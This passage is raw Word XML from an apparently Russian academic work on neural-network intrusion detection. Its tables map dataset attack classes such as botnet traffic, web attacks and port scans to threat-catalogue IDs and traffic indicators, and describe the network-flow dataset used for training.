          <w:p w14:paraId="0DDF404B"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B22435"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Аномальная интенсивность пакетов, асимметрия входящего/исходящего трафика</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="7342CAD0" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1230"/>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7ECD4F62"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Bot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> / C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256B6581"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Связь с серверами управления ботнетом</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2421C5EE"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB2FA8D"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Периодические соединения, обмен командами</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="15AFB5A0" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1035"/>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646B745D"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 xml:space="preserve">Web </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="095BF5B8"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 xml:space="preserve">XSS, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Brute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27EE56D5"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УБИ.006, УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D85EBB0"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Аномальные HTTP-заголовки, последовательности запросов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="252B2837" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="990"/>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10D78A2D"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>PortScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Infiltration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37DCAC07"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Разведка сети, попытки проникновения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C04D8E"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УБИ.116, УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="176BFF3B"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Множественные короткие соединения, перебор портов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="5B0EB4D2" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1065"/>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03B29F26"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76902E1F"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Легитимный трафик</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144659BE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69ED98E0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F212D4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Отрицательный класс для обучения модели</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E3BC842" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F212D4" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367E825D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="008F0FDA" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Представленное сопоставление показывает, что структура классов атак выбранного набора данных в значительной степени соответствует перечню актуальных угроз, определённых на этапе моделирования угроз. Это позволяет использовать данный датасет для обучения нейросетевой модели обнаружения вторжений без существенных искажений экспериментальных результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C0353" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="008F0FDA" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Особое значение имеет наличие атак типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, ботнет-активности и различных веб-атак, поскольку именно эти классы угроз являются наиболее характерными для современных корпоративных сетей. Наличие нормального (легитимного) трафика в выборке также позволяет корректно обучить модель различать нормальное поведение сети и потенциально опасную активность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF86351" w14:textId="1613DA38"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8F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для более детального понимания структуры используемого набора данных в таблице ниже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>таблице 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753" w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> приведены</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> его основные характеристики, включая объем выборки, формат хранения и количество признаков</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606DDF0" w14:textId="3945F240" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Характеристика выбранного набора данных приведена в </w:t>
      </w:r>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблице 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753" w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D0CEB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="002B24BD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="357"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2931"/>
        <w:gridCol w:w="6754"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="6B8E6240" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="151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6546D9"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Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505BC481"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Значение / Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="63A3E7E6" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1022"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505C25D6"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Тип данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2474DB"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Табличные структурированные данные (логи сетевых потоков)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="0E813EAE" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22044397"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Формат хранения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18A1B3F3"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Колоночный бинарный формат, оптимизированный для обработки больших объёмов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="4FA12187" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="892"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F4E650B"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Объём выборки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D870394"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Более 1 миллиона сетевых сессий (~1–2 ГБ в сжатом виде)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="429D2489" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="793"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73900CEF"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Количество признаков</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
